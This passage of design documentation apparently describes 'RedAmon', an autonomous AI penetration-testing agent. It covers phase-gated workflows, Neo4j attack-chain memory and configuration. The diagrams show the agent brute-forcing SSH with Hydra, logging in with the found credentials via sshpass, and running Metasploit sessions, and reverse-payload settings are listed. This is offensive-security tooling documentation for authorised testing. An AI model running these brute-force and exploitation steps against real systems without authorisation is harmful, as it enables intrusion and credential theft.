    U->>A: Approve transition

    Note over A: Phase: Post-Exploitation (Meterpreter)
    A->>MSF: msf_session_run(1, "whoami")
    MSF->>T: Execute command in session
    T-->>MSF: "www-data"
    MSF-->>A: Command output
Loading

Exploitation Workflow: Brute Force Path

sequenceDiagram
    participant U as User
    participant A as Agent
    participant H as Hydra (execute_hydra)
    participant K as Kali Shell
    participant T as Target

    U->>A: "Try SSH brute force on 192.168.1.100"

    Note over A: Initialize: LLM classifies → brute_force_credential_guess
    Note over A: Phase: Informational
    A->>A: Query graph for target info (ports, services)
    A->>A: Request phase transition to exploitation

    U->>A: Approve transition

    Note over A: Phase: Exploitation (brute_force path)
    Note over A: No LHOST/LPORT needed (Hydra is stateless)

    A->>H: -l ubuntu -P unix_passwords.txt -t 4 -f -e nsr -V ssh://192.168.1.100
    H->>T: Try credentials (parallel, 4 threads)
    T-->>H: [22][ssh] host: 192.168.1.100 login: admin password: password123
    H-->>A: 1 valid password found

    Note over A: Credentials detected via inline output analysis

    A->>K: sshpass -p 'password123' ssh admin@192.168.1.100 'whoami && id'
    K->>T: SSH login with discovered credentials
    T-->>K: "admin" + uid info
    K-->>A: SSH access confirmed

    A->>A: Request phase transition to post_exploitation
    U->>A: Approve transition

    Note over A: Phase: Post-Exploitation (Shell via sshpass)
    A->>K: sshpass -p 'password123' ssh admin@192.168.1.100 'uname -a'
    K->>T: Execute command via SSH
    T-->>K: "Linux target 5.15.0..."
    MSF-->>A: Command output
Loading

Q&A Interaction Flow

sequenceDiagram
    participant A as Agent (Think Node)
    participant O as Orchestrator
    participant WS as WebSocket
    participant U as User (Frontend)

    A->>O: Decision: ask_user with question
    O->>O: Store pending_question
    O->>O: Set awaiting_user_question = true
    O->>WS: Send question_request message

    WS->>U: Display question dialog
    Note over U: Dialog shows question, context, format<br/>(text/single_choice/multi_choice)

    Note over O,U: Graph pauses at await_question node (END)

    U->>WS: User provides answer
    WS->>O: Resume with user_question_answer

    O->>O: Create QAHistoryEntry
    O->>O: Add to qa_history
    O->>O: Clear question state
    O->>O: Add answer to messages context

    O->>A: Continue with answer in context

    Note over A: Agent can reference qa_history<br/>in future decisions
Loading

Multi-Objective Session Flow

flowchart TB
    subgraph Objective1["Objective #1: Port scan"]
        O1_START[User: "Scan ports on 192.168.1.1"]
        O1_WORK[Agent executes naabu scan]
        O1_DONE[Objective completed]
    end

    subgraph Objective2["Objective #2: Vulnerability scan"]
        O2_START[User: "Check for CVEs"]
        O2_DETECT[Detect new message after completion]
        O2_CREATE[Create new ConversationObjective]
        O2_WORK[Agent queries graph + analyzes]
        O2_DONE[Objective completed]
    end

    subgraph Objective3["Objective #3: Exploit"]
        O3_START[User: "Exploit CVE-2021-41773"]
        O3_PHASE[Phase transition to exploitation]
        O3_WORK[Agent runs Metasploit]
        O3_DONE[Objective completed]
    end

    subgraph State["Persistent State"]
        TRACE[execution_trace: All steps preserved]
        TARGET[target_info: Accumulates across objectives]
        HISTORY[objective_history: Completed objectives]
        QA[qa_history: All Q&A preserved]
    end

    O1_START --> O1_WORK --> O1_DONE
    O1_DONE --> O2_START
    O2_START --> O2_DETECT --> O2_CREATE --> O2_WORK --> O2_DONE
    O2_DONE --> O3_START
    O3_START --> O3_PHASE --> O3_WORK --> O3_DONE

    O1_DONE -.-> |Archive| HISTORY
    O2_DONE -.-> |Archive| HISTORY
    O3_DONE -.-> |Archive| HISTORY

    O1_WORK -.-> TRACE
    O2_WORK -.-> TRACE
    O3_WORK -.-> TRACE

    O1_WORK -.-> TARGET
    O2_WORK -.-> TARGET
    O3_WORK -.-> TARGET

    style Objective1 fill:#7a7a7a
    style Objective2 fill:#5a5a5a
    style Objective3 fill:#6b6b6b
Loading

Multi-Objective Support

The system handles continuous conversations where users ask multiple sequential questions:

flowchart LR
    subgraph Detection["New Objective Detection"]
        MSG[New user message arrives]
        CHECK{task_complete<br/>from previous?}
        DIFF{Message differs<br/>from current objective?}
        CREATE[Create new ConversationObjective]
    end

    subgraph Archive["Objective Archival"]
        COMPLETE[Current objective completed]
        OUTCOME[Create ObjectiveOutcome]
        STORE[Add to objective_history]
        PRESERVE[Preserve execution_trace,<br/>target_info, qa_history]
    end

    subgraph Phase["Phase Management"]
        INFER[LLM classifies attack path<br/>+ required_phase]
        DOWN{Downgrade to<br/>informational?}
        AUTO[Auto-transition<br/>no approval needed]
        UP{Upgrade to<br/>exploitation?}
        APPROVAL[Require user approval]
    end

    MSG --> CHECK
    CHECK -->|Yes| CREATE
    CHECK -->|No| DIFF
    DIFF -->|Yes| CREATE

    COMPLETE --> OUTCOME --> STORE --> PRESERVE

    CREATE --> INFER
    INFER --> DOWN
    DOWN -->|Yes| AUTO
    DOWN -->|No| UP
    UP -->|Yes| APPROVAL
Loading

Objective State Fields

Field Purpose
conversation_objectives List of all objectives (current + future)
current_objective_index Which objective is being worked on
objective_history Completed objectives with their outcomes
original_objective Backward compatibility with single-objective sessions

EvoGraph — Evolutive Attack Chain Graph

EvoGraph is a persistent, evolutionary graph in Neo4j that runs parallel to the recon graph. While the recon graph captures what exists on the target's attack surface (domains, IPs, ports, services, vulnerabilities), EvoGraph captures what the agent did about it — every tool execution, every discovery, every failure, every strategic decision — across the entire attack lifecycle.

It transforms the agent from a stateless tool executor into a knowledge-accumulating system that learns from every session and builds on prior work.

Why EvoGraph Exists

The previous approach used a flat execution_trace — a linear list of ExecutionStep objects that was:

Problem Impact
Linear No branching, no causal links between steps, no semantic grouping
Ephemeral Lost when the session ended — only persisted in LangGraph checkpoint
Disconnected No structured links to the recon graph (Domain, IP, CVE, etc.)
Context-blind Every step looked the same regardless of significance — the LLM had to scan a wall of text to find what mattered
No failure learning Failed attempts were buried chronologically, indistinguishable from successes

EvoGraph solves all of these by replacing the flat trace with a structured, queryable, persistent graph.

Node Taxonomy

EvoGraph introduces 5 node types, each serving a distinct purpose in the attack lifecycle:

classDiagram
    class AttackChain {
        +string chain_id
        +string title
        +string objective
        +string status
        +string attack_path_type
        +int total_steps
        +int successful_steps
        +int failed_steps
        +list phases_reached
        +string final_outcome
    }

    class ChainStep {
        +string step_id
        +int iteration
        +string phase
        +string tool_name
        +string tool_args_summary
        +string thought
        +string reasoning
        +string output_summary
        +bool success
        +string error_message
        +int duration_ms
    }

    class ChainFinding {
        +string finding_id
        +string finding_type
        +string severity
        +string title
        +string evidence
        +int confidence
        +string phase
    }

    class ChainDecision {
        +string decision_id
        +string decision_type
        +string from_state
        +string to_state
        +string reason
        +string made_by
        +bool approved
    }

    class ChainFailure {
        +string failure_id
        +string failure_type
        +string tool_name
        +string error_message
        +string lesson_learned
        +bool retry_possible
    }

    AttackChain "1" --> "*" ChainStep : HAS_STEP
    ChainStep "1" --> "0..1" ChainStep : NEXT_STEP
    ChainStep "1" --> "*" ChainFinding : PRODUCED
    ChainStep "1" --> "*" ChainFailure : FAILED_WITH
    ChainStep "1" --> "0..1" ChainDecision : LED_TO
    ChainDecision "1" --> "0..1" ChainStep : DECISION_PRECEDED
Loading
Node Type Purpose Created When
AttackChain Root of an attack chain. Maps 1:1 to a chat session (chain_id = sessionId) _start_new_objective_node() via fire_create_attack_chain()
ChainStep Each tool execution — tool name, arguments, output analysis, success/failure _process_tool_output_node() via sync_record_step()
ChainFinding Important intelligence discovered during a step — classified by type and severity After step analysis via fire_record_finding()
ChainDecision Strategic decision points — phase transitions, strategy changes, user approvals On user approval/abort via fire_record_decision()
ChainFailure Structured record of what was tried and why it failed, with lessons learned When step fails via fire_record_failure()

Finding Types: vulnerability_confirmed, credential_found, exploit_success, access_gained, privilege_escalation, service_identified, exploit_module_found, defense_detected, configuration_found, custom

Failure Types: exploit_failed, authentication_failed, connection_failed, permission_denied, timeout, tool_error, detection_blocked, payload_failed

Relationship Taxonomy

Intra-chain relationships connect attack chain nodes to each other:

Relationship From → To Purpose
HAS_STEP AttackChain → ChainStep Links chain root to its first step
NEXT_STEP ChainStep → ChainStep Sequential execution order — the evolutionary link
PRODUCED ChainStep → ChainFinding Step produced this finding
FAILED_WITH ChainStep → ChainFailure Step failed with this failure
LED_TO ChainStep → ChainDecision Step triggered a decision point
DECISION_PRECEDED ChainDecision → ChainStep Decision led to the next step

Bridge relationships connect attack chain nodes back to the recon graph:

Relationship From → To Purpose
CHAIN_TARGETS AttackChain → IP / Subdomain / Port / CVE / Domain The chain's primary target(s) in the recon graph
STEP_TARGETED ChainStep → IP / Subdomain / Port Infrastructure node this step acted on
STEP_EXPLOITED ChainStep → CVE CVE this step attempted to exploit
STEP_IDENTIFIED ChainStep → Technology Technology identified during this step
FOUND_ON ChainFinding → IP / Subdomain Where the finding was discovered
FINDING_RELATES_CVE ChainFinding → CVE CVE related to the finding
CREDENTIAL_FOR ChainFinding → Service / Port Service/port the credential works on
flowchart LR
    subgraph ReconGraph["Recon Graph (existing)"]
        IP[IP]
        Sub[Subdomain]
        Port[Port]
        CVE[CVE]
        Tech[Technology]
        Service[Service]
    end

    subgraph EvoGraphNodes["EvoGraph (attack chain)"]
        AC[AttackChain]
        CS1[ChainStep 1]
        CS2[ChainStep 2]
        CF[ChainFinding]
        CFL[ChainFailure]
        CD[ChainDecision]
    end

    AC -->|HAS_STEP| CS1
    CS1 -->|NEXT_STEP| CS2
    CS1 -->|PRODUCED| CF
    CS2 -->|FAILED_WITH| CFL
    CS2 -->|LED_TO| CD

    AC -.->|CHAIN_TARGETS| IP
    CS1 -.->|STEP_TARGETED| IP
    CS1 -.->|STEP_EXPLOITED| CVE
    CS2 -.->|STEP_IDENTIFIED| Tech
    CF -.->|FOUND_ON| Sub
    CF -.->|FINDING_RELATES_CVE| CVE

    style ReconGraph fill:#2d2d2d,color:#fff
    style EvoGraphNodes fill:#6e6e6e,color:#fff
Loading

Integration with Orchestrator Lifecycle

EvoGraph writes happen at specific points in the orchestrator lifecycle. All writes are fire-and-forget (async, non-blocking) except sync_record_step() which blocks to ensure the step node exists before findings/failures reference it.

sequenceDiagram
    participant User
    participant Orch as Orchestrator
    participant CG as chain_graph_writer
    participant Neo4j
    participant State as AgentState

    User->>Orch: New message (start objective)
    Orch->>CG: fire_create_attack_chain()
    CG-->>Neo4j: MERGE AttackChain + CHAIN_TARGETS bridges
    Note over CG,Neo4j: Async (fire-and-forget)

    loop Each ReAct iteration
        Orch->>Orch: Think → select tool → execute tool
        Orch->>Orch: Analyze output (OutputAnalysisInline)
        Orch->>State: Append to chain_findings_memory
        Orch->>State: Append to chain_failures_memory (if failed)
        Orch->>CG: sync_record_step()
        CG->>Neo4j: CREATE ChainStep + bridge rels
        Note over CG,Neo4j: Synchronous (blocking)

        opt Finding produced
            Orch->>CG: fire_record_finding()
            CG-->>Neo4j: CREATE ChainFinding + PRODUCED + bridges
        end

        opt Step failed
            Orch->>CG: fire_record_failure()
            CG-->>Neo4j: CREATE ChainFailure + FAILED_WITH
        end

        Note over Orch,State: Next think step reads chain_*_memory<br/>via format_chain_context()
    end

    opt Phase transition
        Orch->>State: Append to chain_decisions_memory
        Orch->>CG: fire_record_decision()
        CG-->>Neo4j: CREATE ChainDecision + LED_TO
    end

    Orch->>CG: fire_update_chain_status()
    CG-->>Neo4j: SET status='completed', final_outcome
Loading

Dual Memory Architecture

EvoGraph uses a dual-recording pattern: every significant event is written to both in-memory lists (for fast LLM context) and Neo4j (for persistence and cross-session querying). The two systems serve different purposes and never depend on each other at runtime.

flowchart TB
    subgraph Event["Tool Execution Event"]
        EXEC[Output analyzed by LLM]
    end

    subgraph InMemory["Working Memory (AgentState)"]
        FM[chain_findings_memory]
        FAILM[chain_failures_memory]
        DM[chain_decisions_memory]
    end

    subgraph Persistent["Long-Term Memory (Neo4j)"]
        CF[ChainFinding nodes]
        CFL[ChainFailure nodes]
        CD[ChainDecision nodes]
    end

    subgraph Prompt["System Prompt Injection"]
        CC["{chain_context}<br/>format_chain_context()"]
        PC["{prior_chain_history}<br/>format_prior_chains()"]
    end

    EXEC -->|"Append dict (instant)"| FM
    EXEC -->|"Append dict (instant)"| FAILM
    EXEC -->|"fire_record_* (async)"| CF
    EXEC -->|"fire_record_* (async)"| CFL

    FM --> CC
    FAILM --> CC
    DM --> CC

    CF -.->|"query_prior_chains()<br/>(loaded once at session init)"| PC
    CFL -.->|"query_prior_chains()<br/>(loaded once at session init)"| PC

    style InMemory fill:#474747,color:#fff
    style Persistent fill:#6e6e6e,color:#fff
    style Prompt fill:#404040,color:#fff
Loading

Why not query Neo4j for the current session's context?

Concern Impact
Race condition Graph writes are async. When think iteration N+1 runs, the write from iteration N may not have landed yet
Latency A Neo4j query adds ~100-200ms per iteration. Over 15-30 iterations, that's 1.5-6s of added latency
Availability If Neo4j is slow or unreachable, the agent cannot think at all

The in-memory lists are the fast working memory for the current session. Neo4j is the persistent long-term memory for cross-session queries.

Exploit Success as ChainFinding

The old standalone Exploit node has been replaced by ChainFinding(finding_type="exploit_success"). When an exploit succeeds, fire_record_exploit_success() creates a ChainFinding with:

  • Metasploit metadata: module path, payload, session ID
  • Target metadata: attack type, target IP/port, CVE IDs, credentials
  • Bridge relationships: FOUND_ON → target IP/Subdomain, FINDING_RELATES_CVE → CVE
  • Step-level bridges: STEP_TARGETED → IP, STEP_EXPLOITED → CVE

This replaces the old exploit_writer.py module entirely. The exploit success is now part of the attack chain graph rather than a disconnected standalone node.

Cross-Session Evolutionary Memory

When a new session starts, the orchestrator calls query_prior_chains() which loads up to 5 most recent completed/aborted chains for the same user and project. For each chain:

  • Metadata: title, objective, status, attack path type, step counts, phases reached
  • High-severity findings: only critical and high findings (to limit token usage)
  • Failure lessons: lesson_learned from each ChainFailure

This is formatted by format_prior_chains() and injected into the {prior_chain_history} placeholder. The agent in session B knows what session A tried, what worked, and what failed — enabling it to build on prior work rather than repeating mistakes.

Semantic Chain Context

The {chain_context} placeholder in the system prompt is built by format_chain_context() from the three in-memory lists. It replaces the old flat execution trace with a structured, signal-first format:

Section Content Purpose
Findings [SEVERITY] title (step N) for each accumulated finding Instant signal — what has been discovered
Failed Attempts [step N] failure_type: error_message / Lesson: ... What to avoid — lessons from failures
Decisions [step N] decision_type: from → to (approved/rejected) Session trajectory — strategic turns
Recent Steps Last 5 steps in compact form (tool, args, result) Operational context — what just happened

Compared to the old flat trace:

Aspect Old Flat Trace New Chain Context
Structure Every step formatted identically Three semantic sections + recent steps
Signal LLM must scan ALL steps to find what matters Key findings at the top, severity-tagged
Failures Just a step with success: false buried chronologically Separate section with lesson_learned
Decisions Phase transitions look like regular steps Explicit section showing who approved what
Scale Grows linearly with step count (30 steps = huge prompt) Findings/failures/decisions stay concise; only recent steps expand

Security & Multi-Tenancy

Tenant Isolation

flowchart TB
    subgraph Request["Incoming Request"]
        USER[user_id: "user123"]
        PROJ[project_id: "proj456"]
        SESS[session_id: "sess789"]
    end

    subgraph Context["Context Injection"]
        SET_CTX[set_tenant_context<br/>set_phase_context]
        THREAD[Thread-local variables]
    end

    subgraph Neo4j["Neo4j Query Filtering"]
        QUERY[LLM generates Cypher]
        INJECT[Inject tenant filter]
        FILTERED["WHERE n.user_id = 'user123'<br/>AND n.project_id = 'proj456'"]
    end

    subgraph Checkpoint["Session Checkpointing"]
        CONFIG[LangGraph config with thread_id]
        MEMORY[MemorySaver stores state]
        RESUME[Resume from exact state]
    end

    USER --> SET_CTX
    PROJ --> SET_CTX
    SESS --> CONFIG

    SET_CTX --> THREAD
    THREAD --> INJECT
    QUERY --> INJECT --> FILTERED

    CONFIG --> MEMORY
    MEMORY --> RESUME
Loading

Phase-Based Access Control

flowchart TB
    subgraph Params["Configuration (project_settings.py)"]
        REQ_EXPL[REQUIRE_APPROVAL_FOR_EXPLOITATION]
        REQ_POST[REQUIRE_APPROVAL_FOR_POST_EXPLOITATION]
        ACT_POST[ACTIVATE_POST_EXPL_PHASE]
        POST_TYPE[POST_EXPL_PHASE_TYPE]
    end

    subgraph Validation["Tool Execution Validation"]
        CHECK_PHASE{Tool allowed<br/>in current phase?}
        ALLOW[Execute tool]
        DENY[Return error:<br/>"Tool not available in phase"]
    end

    subgraph Transition["Phase Transition"]
        TO_INFO[To informational]
        TO_EXPL[To exploitation]
        TO_POST[To post_exploitation]
        AUTO_OK[Auto-approve<br/>safe downgrade]
        NEED_APPROVAL[Require user approval]
        BLOCKED[Block if disabled]
    end

    CHECK_PHASE -->|Yes| ALLOW
    CHECK_PHASE -->|No| DENY

    TO_INFO --> AUTO_OK
    TO_EXPL --> |REQ_EXPL=true| NEED_APPROVAL
    TO_EXPL --> |REQ_EXPL=false| AUTO_OK
    TO_POST --> |ACT_POST=false| BLOCKED
    TO_POST --> |REQ_POST=true| NEED_APPROVAL
    TO_POST --> |REQ_POST=false| AUTO_OK
Loading

Prompt Token Optimization

Chain Context (replaces Compact Execution Trace)

The legacy flat format_execution_trace() has been replaced by format_chain_context(), which injects structured attack chain memory into the system prompt via the {chain_context} placeholder. See the EvoGraph — Semantic Chain Context section for the full format.

The new format puts signal up front rather than burying it in a chronological wall of text:

  1. Findings — accumulated ChainFinding entries (severity, title, step number) listed first for instant signal
  2. Failed Attempts — accumulated ChainFailure entries with lesson_learned so the LLM avoids repeating mistakes
  3. Decisions — accumulated ChainDecision entries for context on the session's trajectory
  4. Recent Steps — only the last 5 execution steps in compact form, with the most recent including full tool output

This scales as O(findings + failures + decisions + N) rather than O(total_steps), keeping the prompt size bounded while preserving the most valuable context. Cross-session context is injected separately via {prior_chain_history}, loaded once at session init.

Conditional Prompt Injection

Several prompt sections are only injected when relevant:

Prompt Section Condition
No-module fallback workflow Only after search CVE-* returns no results
Failure loop warning Only after 3+ consecutive similar failures
Mode decision matrix Only in exploitation phase for CVE exploit path
Session config (LHOST/LPORT) Only in statefull exploitation mode

Failure Loop Detection

The orchestrator monitors the execution trace for repeated failures. When 3+ consecutive steps fail with a similar tool/args pattern, a ## FAILURE LOOP DETECTED warning is injected into the system prompt, instructing the agent to try a completely different strategy (web_search for alternatives, different tool/payload, or ask_user for guidance).


Error Handling & Resilience

LLM Response Parsing

flowchart TB
    RESPONSE[LLM Response Text]

    EXTRACT[Extract JSON from response]
    EXTRACT --> PARSE{Parse JSON?}

    PARSE -->|Success| VALIDATE[Pydantic validation]
    PARSE -->|Fail| FALLBACK_JSON[Try extract partial fields]

    VALIDATE -->|Success| DECISION[LLMDecision object]
    VALIDATE -->|Fail| PREPROCESS[Preprocess: remove empty objects<br/>user_question, phase_transition, output_analysis]

    PREPROCESS --> VALIDATE2[Retry validation]
    VALIDATE2 -->|Success| DECISION
    VALIDATE2 -->|Fail| FALLBACK_DECISION[Fallback LLMDecision<br/>action=complete with error]

    FALLBACK_JSON --> FALLBACK_ANALYSIS[Fallback: raw tool output<br/>used as interpretation]
Loading

Metasploit Output Cleaning

flowchart LR
    RAW[Raw msfconsole output]

    ANSI[Remove ANSI escape sequences]
    CR[Handle carriage returns]
    CTRL[Remove control characters]
    ECHO[Filter garbled echo lines]
    TIMING[Timing-based output detection<br/>Wait for quiet period]

    RAW --> ANSI --> CR --> CTRL --> ECHO --> TIMING --> CLEAN[Clean output]
Loading

Neo4j Query Retry

flowchart TB
    QUESTION[Natural language question]

    GEN[LLM generates Cypher]
    EXEC[Execute query]

    EXEC --> CHECK{Success?}
    CHECK -->|Yes| RESULT[Return results]
    CHECK -->|No| RETRY_CHECK{Retries < MAX?}

    RETRY_CHECK -->|Yes| CONTEXT[Add error context to prompt]
    RETRY_CHECK -->|No| ERROR[Return error message]

    CONTEXT --> GEN
Loading

Configuration Reference

Settings Source: project_settings.py

Configuration is now database-driven. When PROJECT_ID and WEBAPP_API_URL environment variables are set, settings are fetched from PostgreSQL via the webapp API. Otherwise, DEFAULT_AGENT_SETTINGS provides fallback values for standalone usage.

flowchart LR
    DB[(PostgreSQL)] --> API[Webapp API<br/>/api/projects/:id]
    API --> PS[project_settings.py<br/>get_setting]
    PS --> ORCH[Orchestrator]
    PS --> PROMPTS[Prompts]
    PS --> TOOLS[Tools]

    DEFAULTS[DEFAULT_AGENT_SETTINGS] -.->|fallback| PS
Loading

Key Parameters

Parameter Default Description
OPENAI_MODEL "claude-opus-4-6" LLM model for reasoning
MAX_ITERATIONS 100 Maximum ReAct loop iterations
EXECUTION_TRACE_MEMORY_STEPS 100 How many steps to include in LLM context
TOOL_OUTPUT_MAX_CHARS 20000 Truncate tool output for LLM analysis
REQUIRE_APPROVAL_FOR_EXPLOITATION true Require user approval for exploitation phase
REQUIRE_APPROVAL_FOR_POST_EXPLOITATION true Require user approval for post-exploitation
ACTIVATE_POST_EXPL_PHASE true Enable post-exploitation phase
POST_EXPL_PHASE_TYPE "statefull" "stateless" or "statefull" session mode
LHOST "" Attacker IP for reverse payloads (empty = bind mode)
LPORT null Attacker port for reverse payloads
BIND_PORT_ON_TARGET 4444 Port opened on target for bind payloads
PAYLOAD_USE_HTTPS false Use HTTPS for staged payloads
HYDRA_ENABLED true Enable/disable THC Hydra brute force tool
HYDRA_THREADS 16 Parallel connections per target (-t). SSH max 4, RDP max 1
HYDRA_WAIT_BETWEEN_CONNECTIONS 0 Seconds between connections per task (-W)
HYDRA_CONNECTION_TIMEOUT 32 Max seconds to wait for response (-w)
HYDRA_STOP_ON_FIRST_FOUND true Stop on first valid credential (-f)
HYDRA_EXTRA_CHECKS "nsr" Extra checks: n=null, s=login-as-pass, r=reversed (-e)
HYDRA_VERBOSE true Show each login attempt (-V)
HYDRA_MAX_WORDLIST_ATTEMPTS 3 Max wordlist strategies before giving up
INFORMATIONAL_SYSTEM_PROMPT "" Custom system prompt injected during informational phase
EXPL_SYSTEM_PROMPT "" Custom system prompt injected during exploitation phase
POST_EXPL_SYSTEM_PROMPT "" Custom system prompt injected during post-exploitation phase
CYPHER_MAX_RETRIES 3 Neo4j text-to-Cypher retry limit
CREATE_GRAPH_IMAGE_ON_INIT false Export LangGraph structure as PNG on startup
TOOL_PHASE_MAP (see below) Per-tool phase access control (DB-driven)

Default TOOL_PHASE_MAP

{
  "query_graph": ["informational", "exploitation", "post_exploitation"],
  "execute_curl": ["informational", "exploitation", "post_exploitation"],
  "execute_naabu": ["informational", "exploitation", "post_exploitation"],
  "execute_nmap": ["informational", "exploitation", "post_exploitation"],
  "execute_nuclei": ["informational", "exploitation", "post_exploitation"],
  "kali_shell": ["informational", "exploitation", "post_exploitation"],
  "execute_code": ["exploitation", "post_exploitation"],
  "metasploit_console": ["exploitation", "post_exploitation"],
  "msf_restart": ["exploitation", "post_exploitation"],
  "web_search": ["informational", "exploitation", "post_exploitation"]
}

Environment Variables

Variable Required Description
OPENAI_API_KEY Yes OpenAI API key for LLM calls
NEO4J_URI Yes Neo4j connection URI
NEO4J_USER Yes Neo4j username
NEO4J_PASSWORD Yes Neo4j password
PROJECT_ID For DB settings Project ID to fetch settings for
WEBAPP_API_URL For DB settings Webapp base URL (e.g., http://localhost:3000)
MCP_NETWORK_RECON_URL No Network recon MCP server URL (default: http://host.docker.internal:8000/sse)
MCP_NMAP_URL No Nmap MCP server URL (default: http://host.docker.internal:8004/sse)
MCP_METASPLOIT_URL No Metasploit MCP server URL (default: http://host.docker.internal:8003/sse)
MCP_NUCLEI_URL No Nuclei MCP server URL (default: http://host.docker.internal:8002/sse)

Running the System

MCP Server Architecture

The MCP layer runs inside a single Kali Linux Docker container with multiple FastMCP servers:

Server Port Tools Description
network_recon 8000 execute_curl, execute_naabu, kali_shell, execute_code HTTP client, port scanner, general shell, code execution
nuclei 8002 execute_nuclei CVE verification & exploitation via YAML templates
metasploit 8003 metasploit_console, msf_restart, msf_session_run, msf_wait_for_session, msf_list_sessions Exploitation framework
nmap 8004 execute_nmap Deep network scanning, service detection, NSE scripts

Start MCP Servers

cd mcp/
docker-compose up -d

Start Agentic API

cd agentic/
docker-compose up -d
# Or for development:
uvicorn api:app --reload --port 8080

WebSocket Connection

const ws = new WebSocket('ws://localhost:8080/ws');

// Authenticate
ws.send(JSON.stringify({
  type: 'init',
  payload: { user_id: 'user123', project_id: 'proj456', session_id: 'sess789' }
}));

// Send query
ws.send(JSON.stringify({
  type: 'query',
  payload: { question: 'Scan ports on 192.168.1.1' }
}));

// Send guidance while agent is working
ws.send(JSON.stringify({
  type: 'guidance',
  payload: { message: 'Focus on port 22 first' }
}));

// Stop agent execution
ws.send(JSON.stringify({ type: 'stop', payload: {} }));

// Resume from last checkpoint
ws.send(JSON.stringify({ type: 'resume', payload: {} }));

// Handle responses
ws.onmessage = (event) => {
  const msg = JSON.parse(event.data);
  console.log(msg.type, msg.payload);
};

Summary

The RedAmon Agentic System provides:

  1. Autonomous Reasoning - LangGraph-based ReAct pattern for intelligent decision making
  2. Phase-Based Security - Controlled progression through informational → exploitation → post-exploitation
  3. Attack Path Classification - LLM-based classification of objectives into CVE exploit or brute force paths, with secondary fallback path support
  4. Dynamic Tool Registry - Single source of truth (tool_registry.py) drives all prompt generation; tool availability tables, argument references, and phase definitions are built at runtime from DB-driven TOOL_PHASE_MAP
  5. Human Oversight - Approval workflows for risky phase transitions and pre-exploitation validation
  6. Real-Time Feedback - WebSocket streaming with progress chunks for long-running commands
  7. Live Guidance - Send steering messages while the agent works, injected into the next think step
  8. Stop & Resume - Interrupt agent execution and resume from the last LangGraph checkpoint
  9. Multi-Tenancy - Isolated sessions with tenant-filtered data access
  10. Stateful Exploitation - Persistent Metasploit sessions with auto-reset and session/credential detection
  11. No-Module Fallback - When Metasploit has no module for a CVE, the agent falls back to manual exploitation using curl, nuclei, code execution, and Kali shell tools
  12. Failure Loop Detection - Detects 3+ consecutive similar failures and forces the agent to pivot to a different strategy
  13. Token Optimization - Compact formatting for older execution trace steps; conditional prompt injection to minimize token usage
  14. Expanded Kali Tooling - nmap, nuclei, kali_shell (netcat, socat, sqlmap, john, searchsploit, msfvenom, gcc/g++), and execute_code for shell-escaping-free script execution
  15. Multi-Objective Support - Continuous conversations with context preservation and per-objective attack path classification
  16. Database-Driven Configuration - All settings fetched from PostgreSQL via webapp API, with standalone defaults fallback
  17. Custom Phase Prompts - Per-phase system prompt injection for project-specific agent behavior
  18. MCP Retry Logic - Exponential backoff retry for MCP server connections to handle container startup races
  19. EvoGraph - Persistent evolutionary attack chain graph in Neo4j tracking every step, finding, decision, and failure. Dual memory architecture (in-memory for speed, Neo4j for persistence) with bridge relationships to the recon graph and cross-session evolutionary learning